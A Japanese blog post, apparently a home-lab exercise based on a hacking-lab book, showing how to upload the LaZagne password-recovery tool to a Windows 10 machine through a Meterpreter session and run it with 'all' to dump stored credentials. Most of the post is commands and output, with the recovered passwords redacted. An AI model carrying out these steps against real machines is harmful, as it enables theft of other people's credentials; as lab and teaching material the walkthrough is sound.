今回は Windows 10 で保持している各種パスワードを特定します。
手法としては、パスワード検索アプリを Windows 10 にアップロードし、アプリの出力結果を Kali に出力させることでパスワードを特定します。
LaZagne のダウンロード
パスワード取得アプリの LaZagne をまず準備します。
Kali のブラウザで以下のURLにアクセスし、LaZagne (Windows.zip)をダウンロードします。
※DL、利用は自己責任でお願いします。
zip ファイルなので、解凍しておきます。
root@kali:~# cd /root/Downloads/
root@kali:~/Downloads# ls
Windows.zip
root@kali:~/Downloads# unzip Windows.zip
Archive: Windows.zip
creating: Windows/
inflating: Windows/laZagne.exe
root@kali:~/Downloads# ls
Windows Windows.zip
root@kali:~/Downloads# ls Windows
laZagne.exe
root@kali:~/Downloads#
Windows 10 へのアップロード
meterpreter プロンプトで「upload <ファイル名>」と実行することで対象のファイルをアップロードできます。
なお、アップロード元のディレクトリは /root のため、先に root ディレクトリにファイルを移動しておきます。
root@kali:~/Downloads/Windows# cp laZagne.exe /root
アップロード先はセッション確立先の現在のディレクトリになります。そのため事前に確認しておきます。
meterpreter > pwd
C:\Users\kdryo\Downloads
meterpreter >
meterpreter コマンドで、upload コマンドを実行します。
meterpreter > upload laZagne.exe
[*] uploading : laZagne.exe -> laZagne.exe
[*] Uploaded 5.51 MiB of 5.51 MiB (100.0%): laZagne.exe -> laZagne.exe
[*] uploaded : laZagne.exe -> laZagne.exe
meterpreter >
Windows 10 のダウンロードフォルダを見ると、laZagne.exe が保存されていることが確認できます。

laZagne.exe の実行
meterpreter プロンプトで「shell」を実行しコマンドプロンプトを操作できる状態にします。
この状態で、laZagne.exe が格納されているフォルダに移動し、ファイルを実行します。
オプションに all をつけることで全パスワードを取得できます。
C:\Users\kdryo\Downloads>laZagne.exe all
laZagne.exe all
---中略---
------------------- Credential manager passwords -----------------
Password found !!!
URL: XboxLive
Login: None
Password:
Password found !!!
URL: MicrosoftAccount:
Login:
Password:
Password found !!!
URL: WindowsLive:(token):
Login:
Password:
Password found !!!
URL: OneDrive Cached Credential
Login:
Password:
[+] 4 passwords have been found.
For more information launch it again with the -v option
elapsed time = 0.0150001049042
C:\Users\kdryo\Downloads>
※ ID/Password は消しています。
このように、Windows 10 で保持しているパスワードを取得できました。(今回取得を試みたパスワードは非表示になっていたり、ハッシュ値となっていました。)
今回は以上です。
くどり
この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。
コメント